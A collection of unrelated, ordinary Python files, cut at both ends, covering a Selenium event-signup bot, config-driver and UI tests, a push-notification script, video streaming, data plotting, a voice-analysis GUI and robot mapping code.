return self._api_map["lief"].get(to_addr, None)
return None
|
"""
RUNBASE-IMP
HTML scraping bot for monitoring Adidas Runners events
Author: Francesco Ramoni
francesco[dot]ramoni@email.it
https://github.com/framoni/
"""
import json
from lxml import html
from selenium import webdriver
import time
from twilio.rest import Client
#-------------------------------------------------------------------------------
# PARAMETERS
# url to be scraped
ar_url = 'https://www.adidas.it/adidasrunners/community/milano'
# request header
user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
# message
message = 'Le iscrizioni agli eventi Adidas Runners di questa settimana sono state effettuate. runbase-imp'
# twilio data
with open("runbase-imp-param.json") as j:
for line in j:
td = json.loads(line)
# set webdriver options
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument(f'user-agent={user_agent}')
#-------------------------------------------------------------------------------
# FUNCTIONS
# function to scrape event url
def scrape_event_url(event_name):
browser.get(ar_url)
event_url = browser.find_element_by_xpath('//a[contains(div//div//h3, "{}") and contains(., "SENZA spogliatoio")]'.format(event_name)).get_attribute("href")
return event_url
# function to sign up to an event
def event_signup(event_name, do_login):
print("Event: {}".format(event_name))
event_url = scrape_event_url(event_name)
# go to event page
browser.get(event_url)
# login
if do_login:
login()
# wait 10 seconds to bypass a UI visual bug (?) showing a second login form
time.sleep(10)
# sign up to the event
button_signup = browser.find_element_by_xpath('//*[@title="Iscriviti"]')
browser.execute_script("arguments[0].click();", button_signup)
# function to login to the portal
def login():
# click on login button
button_login = browser.find_element_by_xpath('//*[@title="Accedi"]')
browser.execute_script("arguments[0].click();", button_login)
# send username, password and confirm
browser.find_element_by_id('email').send_keys(td['email'])
browser.find_element_by_id('password').send_keys(td['pass'])
button_send = browser.find_element_by_xpath('//*[@title="Invia"]')
browser.execute_script("arguments[0].click();", button_send)
return
#-------------------------------------------------------------------------------
# SCRAPING
# create a new driver
browser = webdriver.Chrome(chrome_options=options)
browser.implicitly_wait(60)
print("Signing up to the Adidas Runners events... ")
# sign up to events of interest
event_signup('MONDAY HEROES', True)
event_signup('ROAD TO YOUR BEST', False)
# close the driver
browser.quit()
# send a SMS to notify
print("Notifying via SMS... ")
client = Client(td['twilio_client'], td['twilio_token'])
client.messages.create(to=td['phone_to'], from_=td['phone_from'], body=message)
print("Job done. ")
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Functional test cases for the Castellan Oslo Config Driver.
Note: This requires local running instance of Vault.
"""
import tempfile
from oslo_config import cfg
from oslo_config import fixture
from oslotest import base
from castellan import _config_driver
from castellan.common.objects import opaque_data
from castellan.tests.unit.key_manager import fake
class CastellanSourceTestCase(base.BaseTestCase):
def setUp(self):
super(CastellanSourceTestCase, self).setUp()
self.driver = _config_driver.CastellanConfigurationSourceDriver()
self.conf = cfg.ConfigOpts()
self.conf_fixture = self.useFixture(fixture.Config(self.conf))
def test_incomplete_driver(self):
# The group exists, but does not specify the
# required options for this driver.
self.conf_fixture.load_raw_values(
group='incomplete_driver',
driver='castellan',
)
source = self.conf._open_source_from_opt_group('incomplete_driver')
self.assertIsNone(source)
self.assertEqual(self.conf.incomplete_driver.driver, 'castellan')
def test_complete_driver(self):
self.conf_fixture.load_raw_values(
group='castellan_source',
driver='castellan',
config_file='config.conf',
mapping_file='mapping.conf',
)
with base.mock.patch.object(
_config_driver,
'CastellanConfigurationSource') as source_class:
self.driver.open_source_from_opt_group(
self.conf, 'castellan_source')
source_class.assert_called_once_with(
'castellan_source',
self.conf.castellan_source.config_file,
self.conf.castellan_source.mapping_file)
def test_fetch_secret(self):
# fake KeyManager populated with secret
km = fake.fake_api()
secret_id = km.store("fake_context",
opaque_data.OpaqueData(b"super_secret!"))
# driver config
config = "[key_manager]\nbackend=vault"
mapping = "[DEFAULT]\nmy_secret=" + secret_id
# creating temp files
with tempfile.NamedTemporaryFile() as config_file:
config_file.write(config.encode("utf-8"))
config_file.flush()
with tempfile.NamedTemporaryFile() as mapping_file:
mapping_file.write(mapping.encode("utf-8"))
mapping_file.flush()
self.conf_fixture.load_raw_values(
group='castellan_source',
driver='castellan',
config_file=config_file.name,
mapping_file=mapping_file.name,
)
source = self.driver.open_source_from_opt_group(
self.conf,
'castellan_source')
# replacing key_manager with fake one
source._mngr = km
# testing if the source is able to retrieve
# the secret value stored in the key_manager
# using the secret_id from the mapping file
self.assertEqual("super_secret!",
source.get("DEFAULT",
"my_secret",
cfg.StrOpt(""))[0])
|
#!/usr/bin/python
##
# Send a push message via the Google Cloud Messaging.
#
# Dependencies:
# - python-gcm. Install it with pip: pip install python-gcm.
#
# Params:
# 1.: GCM API key.
# 2.: Target device registration id.
# 3. - : The message's key-value pairs, separated with ':'.
#
# Examples:
# $ send-push.py api_key reg_id title:mytitle detail:mydetail
##
# process args
import sys
api_key = sys.argv[1]
reg_id = sys.argv[2]
data = {}
try:
argi = 3
while True:
splittedArg = sys.argv[argi].split(':')
data[splittedArg[0]] = splittedArg[1]
argi += 1
except IndexError:
print 'Args processed. The message:'
import pprint
pprint.pprint(data, width=1)
# send the request
from gcm import GCM
gcm = GCM(api_key)
response = gcm.json_request(registration_ids=[reg_id], data=data, priority='high')
# print successfully handled registration_ids
if response and 'success' in response:
for reg_id, success_id in response['success'].items():
print 'Successfully sent notification for reg_id {0}'.format(reg_id)
else:
print 'Failed to send any notification'
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging as log
import time
from multiprocessing import Process, Value, Array
import cv2
import numpy as np
class VideoStream:
""" This class returns constant framerate frames from the input stream. """
def __init__(self, input_source, trg_fps, batch_size):
"""Constructor"""
try:
self._input_source = int(input_source)
except ValueError:
self._input_source = input_source
self._trg_fps = trg_fps
assert self._trg_fps > 0
self._batch_size = batch_size
assert self._batch_size > 0
cap = cv2.VideoCapture(self._input_source)
assert cap.isOpened(), "Can't open " + str(self._input_source)
self.source_fps = cap.get(cv2.CAP_PROP_FPS)
source_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
source_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
cap.release()
self._image_shape = [source_height, source_width, 3]
self._batch_shape = [batch_size] + self._image_shape
self._image_buffer_size = int(np.prod(self._image_shape))
self._batch_buffer_size = int(np.prod(self._batch_shape))
self._source_finished = Value('i', False, lock=False)
self._raw_frame = Array('B', self._image_buffer_size, lock=True)
self._slow_frame = Array('B', self._image_buffer_size, lock=True)
self._slow_batch = Array('B', self._batch_buffer_size, lock=True)
self._frame_generator_process = None
self._producer_process = None
def fps(self):
"""Returns the input source fps"""
return self.source_fps
def get_live_frame(self):
"""Returns last live frame from the input stream"""
if self._source_finished.value:
return None
with self._raw_frame.get_lock():
buffer = np.frombuffer(self._raw_frame.get_obj(), dtype=np.uint8)
frame = np.copy(buffer.reshape(self._image_shape))
return frame
def get_batch(self):
"""Returns last batch of frames with constant framerate from the input stream"""
if self._source_finished.value:
return None
with self._slow_batch.get_lock():
buffer = np.frombuffer(self._slow_batch.get_obj(), dtype=np.uint8)
batch = np.copy(buffer.reshape(self._batch_shape))
return batch
def start(self):
"""Starts internal threads"""
self._frame_generator_process = \
Process(target=self._frame_generator,
args=(self._input_source, self._raw_frame, self._image_shape,
self._source_finished))
self._frame_generator_process.daemon = True
self._frame_generator_process.start()
self._producer_process = \
Process(target=self._producer,
args=(self._raw_frame, self._slow_frame, self._slow_batch,
self._trg_fps, self._batch_size, self._image_shape,
self._source_finished))
self._producer_process.daemon = True
self._producer_process.start()
def release(self):
"""Release internal threads"""
if self._frame_generator_process is not None:
self._frame_generator_process.terminate()
self._frame_generator_process.join()
if self._producer_process is not None:
self._producer_process.terminate()
self._producer_process.join()
@staticmethod
def _frame_generator(input_source, out_frame, frame_shape, finish_flag):
"""Produces live frames from the input stream"""
cap = cv2.VideoCapture(input_source)
cap.set(cv2.CAP_PROP_BUFFERSIZE, 1)
source_fps = cap.get(cv2.CAP_PROP_FPS)
if source_fps > 0:
trg_time_step = 1.0 / source_fps
else:
log.warning('Got a non-positive value as FPS of the input. Interpret it as 30 FPS')
trg_time_step = 1.0 / 30.0
while True:
start_time = time.perf_counter()
_, frame = cap.read()
if frame is None:
break
with out_frame.get_lock():
buffer = np.frombuffer(out_frame.get_obj(), dtype=np.uint8)
np.copyto(buffer.reshape(frame_shape), frame)
end_time = time.perf_counter()
elapsed_time = end_time - start_time
rest_time = trg_time_step - elapsed_time
if rest_time > 0.0:
time.sleep(rest_time)
finish_flag.value = True
cap.release()
@staticmethod
def _producer(input_frame, out_frame, out_batch, trg_fps, batch_size, image_shape, finish_flag):
"""Produces frames and batch of frames with constant framerate
from the internal stream of frames"""
trg_time_step = 1.0 / float(trg_fps)
batch_shape = [batch_size] + image_shape
frame_buffer = []
while not finish_flag.value:
start_time = time.perf_counter()
with input_frame.get_lock():
in_frame_buffer = np.frombuffer(input_frame.get_obj(), dtype=np.uint8)
frame = np.copy(in_frame_buffer.reshape(image_shape))
with out_frame.get_lock():
out_frame_buffer = np.frombuffer(out_frame.get_obj(), dtype=np.uint8)
np.copyto(out_frame_buffer.reshape(image_shape), frame)
frame_buffer.append(frame)
if len(frame_buffer) > batch_size:
frame_buffer = frame_buffer[-batch_size:]
if len(frame_buffer) == batch_size:
with out_batch.get_lock():
out_batch_buffer = np.frombuffer(out_batch.get_obj(), dtype=np.uint8)
np.copyto(out_batch_buffer.reshape(batch_shape), frame_buffer)
end_time = time.perf_counter()
elapsed_time = end_time - start_time
rest_time = trg_time_step - elapsed_time
if rest_time > 0.0:
time.sleep(rest_time)
|
from datarefinery.TupleOperations import keep
def test_empty():
inp = None
op = keep(["field1"])
(res, err) = op(inp)
assert res is None
assert err == {'field1': 'field1 not found'}
def test_some_value():
inp = {"field1": True}
op = keep(["field1"])
(res, err) = op(inp)
assert res == {"field1": True}
assert err is None
def test_field_not_found():
inp = {"field1": True}
op = keep(["missing"])
(res, err) = op(inp)
assert res is None
assert err == {'missing': 'missing not found'}
def test_multiple_fields():
inp = {"field1": True, "field2": True, "field3": True, "field4": True}
op = keep(["field1", "field2", "field3"])
(res, err) = op(inp)
assert err is None
assert res == {"field1": True, "field2": True, "field3": True}
|
from baseq.setting import r_script_dir
import os, sys
from baseq.mgt import get_config, run_cmd
def plot_genome(bincount, cbs_path, path_out):
"""Plot the genome
"""
script = os.path.join(r_script_dir, "Genome_Plot.R")
#dynamic_bin = get_config("CNV_ref_"+genome, "dynamic_bin")
cmd = "Rscript {} {} {} {}".format(script, bincount, cbs_path, path_out)
try:
run_cmd("Plot Genome", cmd)
#build the json...
except:
sys.exit("[error] Failed to run the Normalize Rscript ...")
|
import sys
def main():
x=int(input())
arr=[int(i) for i in input().split()]
for i in range(x-1):
# a1=arr[i]
for j in range(i+1,x):
if arr[i]>arr[j]:
tem=arr[i]
arr[i]=arr[j]
arr[j]=tem
print(" ".join([str(i) for i in arr]))
try:
while True :
main()
except:
pass
# for i in range(x):
# d=main()
# out.append("Case {}: {}".format(i+1,d))
# for i in out:
# print(i)
|
import numpy as np
df = h2o.H2OFrame.from_python(np.random.randn(100,4).tolist(), column_names=list('ABCD'))
# View top 10 rows of the H2OFrame
df.head()
# A B C D
# --------- ---------- ---------- ---------
# -0.613035 -0.425327 -1.92774 -2.1201
# -1.26552 -0.241526 -0.0445104 1.90628
# 0.763851 0.0391609 -0.500049 0.355561
# -1.24842 0.912686 -0.61146 1.94607
# 2.1058 -1.83995 0.453875 -1.69911
# 1.7635 0.573736 -0.309663 -1.51131
# -0.781973 0.051883 -0.403075 0.569406
# 1.40085 1.91999 0.514212 -1.47146
# -0.746025 -0.632182 1.27455 -1.35006
# -1.12065 0.374212 0.232229 -0.602646
#
# [10 rows x 4 columns]
# View bottom 5 rows of the H2OFrame
df.tail(5)
# A B C D
# --------- ---------- --------- ---------
# 1.00098 -1.43183 -0.322068 0.374401
# 1.16553 -1.23383 -1.71742 1.01035
# -1.62351 -1.13907 2.1242 -0.275453
# -0.479005 -0.0048988 0.224583 0.219037
# -0.74103 1.13485 0.732951 1.70306
#
# [5 rows x 4 columns]
|
# -*- coding: utf-8 -*-
from models.group import Group
def test_FullForm(app, db, json_groups, check_ui):
group = json_groups
old_groups = db.get_group_list()
app.groups.create(group)
# assert len(old_groups) + 1 == app.groups.count_groups()
new_groups = db.get_group_list()
old_groups.append(group)
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.groups.get_group_list(),
key=Group.id_or_max)
# def test_EmptyForm(app):
# old_groups = app.groups.get_group_list()
# group = Group(name="", header="", footer="")
# app.groups.create(group)
# new_groups = app.groups.get_group_list()
# assert len(old_groups) + 1 == len(new_groups)
# old_groups.append(group)
# assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
# testdata = [Group(name="", header="", footer="")] + [
# Group(name=random_string("name", 10), header=random_string("header", 20), footer=random_string("footer", 20))
# for i in range(5)
# ]
# testdata = [
# Group(name=name, header=header, footer=footer)
# for name in ["", random_string("name", 10)]
# for header in ["", random_string("header", 20)]
# for footer in ["", random_string("footer", 20)]
# ]
|
import re
from model.contact import Contact
from random import randrange
from fixture.db import DbFixture
from test.test_email import merge_emails_like_on_home_page
def test_phones_on_home_page(app):
contact_from_home_page = app.contact.get_contact_list()[0]
contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
def test_contact_data_on_home_page(app):
contact_from_home_page = app.contact.get_contact_list()[0]
contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
assert contact_from_home_page.all_emails_from_home_page == merge_emails_like_on_home_page(contact_from_edit_page)
def test_contact_data_on_db(app, db):
contacts_from_ui = sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
contacts_from_db = sorted(db.get_contact_list(), key=Contact.id_or_max)
for i, contacts in enumerate(contacts_from_ui):
contact_from_db = contacts_from_db[i]
assert contacts.firstname == contact_from_db.firstname
assert contacts.lastname == contact_from_db.lastname
assert contacts.id == contact_from_db.id
#emails_from_ui = contacts.all_emails_from_home_page.splitlines()
# emails_from_db = []
# if contact_from_db.email:
# emails_from_db.append(contact_from_db.email)
# if contact_from_db.email2:
# emails_from_db.append(contact_from_db.email2)
# if contact_from_db.email3:
# emails_from_db.append(contact_from_db.email3)
#assert emails_from_db == emails_from_ui
#assert contacts.address == contact_from_db.address
assert contacts.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_db)
assert contacts.all_emails_from_home_page == merge_emails_like_on_home_page(contact_from_db)
# def test_phones_on_contact_view_page(app):
# contact_from_view_page = app.contact.get_contact_from_view_page(0)
# contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
# assert contact_from_view_page.homephone == contact_from_edit_page.homephone
# assert contact_from_view_page.mobilephone == contact_from_edit_page.mobilephone
# assert contact_from_view_page.workphone == contact_from_edit_page.workphone
# assert contact_from_view_page.secondaryphone == contact_from_edit_page.secondaryphone
def clear(s):
return re.sub("[() -]", "", s)
def merge_phones_like_on_home_page(contact):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contact.homephone, contact.mobilephone, contact.workphone, contact.secondaryphone]))))
|
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
def read_log(filename):
with open(filename, 'r') as file_h:
content = file_h.readlines()
preprocessors = []
regressors = []
rescalers = []
idx = 0
for line in content:
if 'preprocessor:__choice__' in line:
preprocessors.append(line.split('Value: ')[1].replace("'", '').strip())
elif 'regressor:__choice__' in line:
regressors.append(line.split('Value: ')[1].replace("'", '').strip())
elif 'rescaling:__choice__' in line:
rescalers.append(line.split('Value: ')[1].replace("'", '').strip())
# just a quick check
df = pd.DataFrame({'preprocessor': preprocessors, 'regressor': regressors, 'rescaling': rescalers})
return df
if __name__ == '__main__':
df = read_log('automl.log')
# df = read_log('automl_no_pp.log')
# df = pd.read_pickle('automl.p')
# df = df.drop_duplicates()
pre_x = 0
reg_x = 20
res_x = 10
f, ax = plt.subplots(1)
bbox = {'boxstyle': 'round', 'facecolor': 'wheat'}
for idx, row in df.iterrows():
y_pre = np.where(df.preprocessor.unique() == row.preprocessor)[0]
y_res = np.where(df.rescaling.unique() == row.rescaling)[0]
y_reg = np.where(df.regressor.unique() == row.regressor)[0]
ax.plot([pre_x, res_x, reg_x], [y_pre, y_res, y_reg], 'k-', alpha=.3)
for idx, preprocessor in enumerate(df.preprocessor.unique()):
ax.plot(pre_x, idx, 'ko', markerfacecolor='w', markeredgecolor='k', markeredgewidth=1)
ax.text(pre_x, idx, preprocessor, ha='right', va='center', bbox=bbox)
for idx, rescaler in enumerate(df.rescaling.unique()):
ax.plot(res_x, idx, 'ko', markerfacecolor='w', markeredgecolor='k', markeredgewidth=1)
ax.text(res_x, idx, rescaler, ha='center', va='center', bbox=bbox)
for idx, regressor in enumerate(df.regressor.unique()):
ax.plot(reg_x, idx, 'ko', markerfacecolor='w', markeredgecolor='k', markeredgewidth=1)
ax.text(reg_x, idx, regressor, ha='left', va='center', bbox=bbox)
ax.text(reg_x, len(df.regressor.unique()), 'Regressor', ha='left', va='center', fontweight='bold')
ax.text(res_x, len(df.rescaling.unique()), 'Rescaling', ha='center', va='center', fontweight='bold')
ax.text(pre_x, len(df.preprocessor.unique()), 'Preprocessor', ha='right', va='center', fontweight='bold')
ax.set_xlim(-20, 30)
ax.axis('off')
plt.show()
|
#!/usr/bin/env python
# Author: Derrick H. Karimi
# Copyright 2014
# Unclassified
import re
import botlog
from bbot.Utils import *
from bbot.StatsParser import StatsParser
S = SPACE_REGEX
N = NUM_REGEX
class EndTurnParser(StatsParser):
def __init__(self):
StatsParser.__init__(self)
self.buymenu = True
def get_patterns(self):
return {
'Your dominion gained ' + NUM_REGEX + ' million people\.': 1610,
'Your dominion lost ' + NUM_REGEX + ' million people\.': 1620,
NUM_REGEX + ' units of food spoiled\.': 1630,
NUM_REGEX + ' units of food has been eaten by a hungry user\.': 1640
}
def on_match(self, app, line, which):
realm = app.data.realm
army = realm.army
regions = realm.regions
if which == 1610:
app.data.realm.population.growth = self.get_num(0)
elif which == 1620:
app.data.realm.population.growth = -self.get_num(0)
elif which == 1630:
app.data.realm.food.spoilage = self.get_num(0)
elif which == 1640:
app.data.realm.food.randomly_eaten = self.get_num(0)
|
import qdarkstyle
import sys
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from Voicelab.VoicelabWizard.InputTab import InputTab
from Voicelab.VoicelabWizard.OutputTab import OutputTab
from Voicelab.VoicelabWizard.SettingsTab import SettingsTab
#from Voicelab.VoicelabWizard.ExperimentalTab import ExperimentalTab
from Voicelab.VoicelabWizard.VoicelabController import VoicelabController
#from Voicelab.VoicelabWizard.ManipulationWindow import ManipulationWindow
from Voicelab.default_settings import available_functions, default_functions
import logging
sys.setrecursionlimit(10000)
class VoicelabWizard(QMainWindow):
# triggers when the list of loaded files has changed with the active list of files
on_files_changed = pyqtSignal(list)
# triggers when a setting is changed with the list of active settings for the respective function
on_settings_changed = pyqtSignal(dict)
# triggers when the list of active functions is changed with the list of active functions
on_functions_changed = pyqtSignal(dict)
# triggers when the pipeline is done processing all of the files with the results
on_processing_completed = pyqtSignal(dict)
# triggers on each node finishing with the node name, the start, current, and end count of processed nodes
on_progress_updated = pyqtSignal(str, int, int, int)
def __init__(self):
super().__init__()
# set the icon in the corner of the window
self.setWindowIcon(QIcon('favicon.ico'))
# signals are created once and passed into each tab
# TODO: this may be possible using a singleton class or some other OOP way
# Puts all signals into a dictionary that's loaded into each tab
self.voicelab_signals = {
"on_files_changed": self.on_files_changed,
"on_settings_changed": self.on_settings_changed,
"on_functions_changed": self.on_functions_changed,
"on_processing_completed": self.on_processing_completed,
"on_progress_update": self.on_progress_updated,
}
# Specifies the default size of the window,
# this should be long enough to have all the settings without a slider
self.setMinimumSize(QSize(800, 880))
# Specifies the default title, simply change the string to change this
self.setWindowTitle("Voice Lab: Reproducible Automated Voice Analysis")
# This is the main widget in the main window
central_widget = QWidget(self)
self.setCentralWidget(central_widget)
# This set's up a grid layout for the central_widget
central_layout = QGridLayout(self)
central_widget.setLayout(central_layout)
# This sets up the tab layout for the central_layout
self.tabs = QTabWidget()
central_layout.addWidget(self.tabs)
# init: setup the base state of a controller, including a data model
self.data_controller = VoicelabController()
# links the progress updating on the data controller side to a pyqt signal that can be listened to anywhere
self.data_controller.progress_callback = lambda node, start, current, end: self.voicelab_signals[
"on_progress_update"
].emit(
node.node_id, start, current, end
)
# load all of the functions specified in the default settings file
for fn in available_functions:
self.data_controller.load_function(
fn, available_functions[fn], default=fn in default_functions
)
# add the Input Tab
self.tabs.addTab(
InputTab(
self.data_controller, self.voicelab_signals, self.tabs, parent=self
),
"Load Voices",
)
# add the Settings Tab
self.tabs.addTab(
SettingsTab(
self.data_controller, self.voicelab_signals, self.tabs, parent=self
),
"Settings",
)
# add the Output Tab
self.tabs.addTab(
OutputTab(
self.data_controller, self.voicelab_signals, self.tabs, parent=self
),
"Results",
)
# add the Voice Spectrum Tab
#self.tabs.addTab(
# ExperimentalTab(
# self.data_controller, self.voicelab_signals, self.tabs, parent=self
# ),
# "Results (Spectrum)",
#)
# add the Manipulation Tab
#self.tabs.addTab(
# ManipulationWindow(
# self.data_controller, self.voicelab_signals, self.tabs, parent=self
# ),
# "Voice Manipulations",
#)
# Experimental tab
#self.tabs.addTab(
# ExperimentalTab(
# self.data_controller, self.voicelab_signals, self.tabs, parent=self
# ),
# "Experimental", # Specify the Tab title here
#)
if __name__ == "__main__":
# boilerplate pyqt window creation
app = QApplication(sys.argv)
# setup stylesheet
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
# Create an instance of VoiceLab
w = VoicelabWizard()
# Show the GUI
w.show()
# Exit gracefully
sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
from os.path import join, exists
import six
from asv import config
from asv.commands.publish import Publish
RESULT_DIR = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'example_results'))
def test_publish(tmpdir):
tmpdir = six.text_type(tmpdir)
os.chdir(tmpdir)
conf = config.Config.from_json(
{'results_dir': RESULT_DIR,
'html_dir': join(tmpdir, 'html'),
'repo': 'https://github.com/spacetelescope/asv.git',
'project': 'asv'})
Publish.run(conf)
assert exists(join(tmpdir, 'html', 'index.html'))
assert exists(join(tmpdir, 'html', 'index.json'))
assert exists(join(tmpdir, 'html', 'asv.js'))
assert exists(join(tmpdir, 'html', 'asv.css'))
|
#!/usr/bin/env python3
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the state of an environment being explored by the robot.
This is a support class for the proximity_mapper example.
Includes a utility for rendering the state in OpenGL.
"""
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['ClearedTerritory', 'MapState', 'Wall', 'WallSegment']
from math import cos, sin, pi
import multiprocessing as mp
from typing import List
from anki_vector.util import Vector3
try:
from OpenGL.GL import (GL_AMBIENT, GL_BLEND, GL_DIFFUSE, GL_FILL, GL_FRONT, GL_FRONT_AND_BACK, GL_LIGHTING,
GL_LINES, GL_ONE_MINUS_SRC_ALPHA, GL_POINTS, GL_QUADS, GL_SHININESS, GL_SPECULAR, GL_SRC_ALPHA,
glBegin, glBlendFunc, glColor, glDisable, glEnable, glEnd, glMaterialfv, glNormal3f,
glPointSize, glPolygonMode, glVertex3f)
except ImportError as import_exc:
from anki_vector.opengl import opengl
opengl.raise_opengl_or_pillow_import_error(import_exc)
# Constants
#: Visually represent not just walls, but open/loose nodes, territories and navigation
#: points in the 3D Viewer.
RENDER_METADATA_OBJECTS = True
#: Display color of potential exploration targets in the 3D Viewer.
NODE_OPEN_RENDER_COLOR = [0.0, 1.0, 1.0, 0.75]
#: Display size (in pixels) of potential exploration targets in the 3D Viewer.
NODE_OPEN_RENDER_SIZE = 5.0
#: Display color of detected proximity collisions in the 3D Viewer.
#: These nodes will be collected into walls, and will only live long term if isolated
#: too far from any other contact points
NODE_CONTACT_RENDER_COLOR = [1.0, 0.0, 0.0, 0.75]
#: Display size (in pixels) of detected proximity collisions in the 3D Viewer.
NODE_CONTACT_RENDER_SIZE = 2.0
#: Display color of the rendered disc for the position the robot will next navigate to.
NAV_POINT_RENDER_COLOR = [0.0, 1.0, 0.0, 1.0]
#: Sections of the rendered disc for the position the robot will next navigate to.
NAV_POINT_RENDER_SECTIONS = 16
#: Display size of the rendered disc for the position the robot will next navigate to.
NAV_POINT_RENDER_SIZE = 25.0
#: Display color of the rendered disc for the territories the robot has already explored.
TERRITORY_RENDER_COLOR = [0.15, 0.6, 1.0, 1.0]
#: Sections of the rendered disc for the territories the robot has already explored.
TERRITORY_RENDER_SECTIONS = 32
#: Display color for the walls the robot has identified in the environment.
WALL_RENDER_COLOR = [1.0, 0.4, 0.1, 1.0]
#: Render height of the walls the robot has identified in the environment.
#: This values is purely cosmetic. As the proximity sensor is at a static height and
#: always faces forward, the robot has no way of detecting through this method how tall the
#: obstacles are, so the 100mm height was tuned to be similar to Vector in the viewer
#: rather than reflecting the objects in the environment.
WALL_RENDER_HEIGHT_MM = 100.0
class WallSegment:
"""Two points defining a segment of wall in the world
:param a: The first end of the wall segment expected to be in the xy plane
:param b: The second end of the wall segment expected to be in the xy plane
"""
def __init__(self, a: Vector3, b: Vector3):
self._a = a
self._b = b
# precalculate the normal for use in the render call
aToB = b - a
facing_vector = aToB.cross(Vector3(0, 0, 1))
self._normal = facing_vector.normalized
@property
def a(self) -> Vector3:
""":return: The first end of the wall segment."""
return self._a
@property
def b(self) -> Vector3:
""":return: The second end of the wall segment."""
return self._b
@property
def normal(self) -> Vector3:
""":return: The precalculated normal of the wall segment."""
return self._normal
class Wall:
"""A chain of WallSegments making up a continuous wall in 3d space
:param segment: The initial wall segment for this wall
"""
def __init__(self, segment: WallSegment):
self._vertices = [segment.a, segment.b]
def insert_head(self, vertex: Vector3):
"""Adds a new vertex to the front of the wall
:param vertex: The coordinates of the vertex being added to the front of the wall.
This point is expected to be near the current head, and in the same xy plane.
"""
self._vertices.insert(0, vertex)
def insert_tail(self, vertex: Vector3):
"""Adds a new vertex to the end of the wall
:param vertex: The coordinates of the vertex being added to the end of the wall.
This point is expected to be near the current tail, and in the same xy plane.
"""
self._vertices.append(vertex)
@property
def vertices(self) -> List[Vector3]:
""":return: All the vertices defining the ground vertices of the wall."""
return self._vertices
@property
def segments(self) -> List[WallSegment]:
""":return: Constructs and returns the WallSegments which make up this wall."""
result: List[WallSegment] = []
for i in range(len(self._vertices) - 1):
result.append(WallSegment(self._vertices[i], self._vertices[i + 1]))
return result
class ClearedTerritory:
"""A zone of space that the robot has already explored. These are used to
prevent the robot from populating new open nodes in finished areas.
Cleared Territories always exist in the x-y plane.
:param center: Centerpoint of the zone
:param radius: The size of the zone
"""
def __init__(self, center: Vector3, radius: Vector3):
self._center = center
self._radius = radius
@property
def center(self) -> Vector3:
""":return: The centerpoint of the territory."""
return self._center
@property
def radius(self) -> float:
""":return: The radius of the territory."""
return self._radius
class MapState:
"""A collection of walls, nodes, and territories defining the area the robot
is exploring.
"""
def __init__(self):
self._open_nodes: List[Vector3] = []
self._contact_nodes: List[Vector3] = []
self._walls: List[Wall] = []
self._cleared_territories: List[ClearedTerritory] = []
self._collection_active: bool = False
@staticmethod
def _set_color(color: List[float]):
"""Modifies the OpenGL state's active material with a specific color
used on the specular & diffuse channels, with limited ambient.
This function must be invoked inside the OpenGL render loop.
:param color: the color to use for the material
"""
glColor(color)
glMaterialfv(GL_FRONT, GL_AMBIENT, [color[0] * 0.1, color[1] * 0.1, color[2] * 0.1, 1.0])
glMaterialfv(GL_FRONT, GL_DIFFUSE, color)
glMaterialfv(GL_FRONT, GL_SPECULAR, color)
glMaterialfv(GL_FRONT, GL_SHININESS, 10.0)
@classmethod
def _render_points(cls, point_list: List[Vector3], size: float, color: List[float]):
"""Draws a collection of points in the OpenGL 3D worldspace.
This function must be invoked inside the OpenGL render loop.
:param point_list: the points to render in the view context
:param size: the size in pixels of each point
:param color: the color to render the points
"""
glPointSize(size)
cls._set_color(color)
glBegin(GL_POINTS)
for point in point_list:
glVertex3f(point.x, point.y, point.z)
glEnd()
@classmethod
def _render_circle(cls, center: Vector3, radius: float, sections: int, color: List[float]):
"""Draws a circle out of dashed lines around a center point in the x-y plane.
This function must be invoked inside the OpenGL render loop.
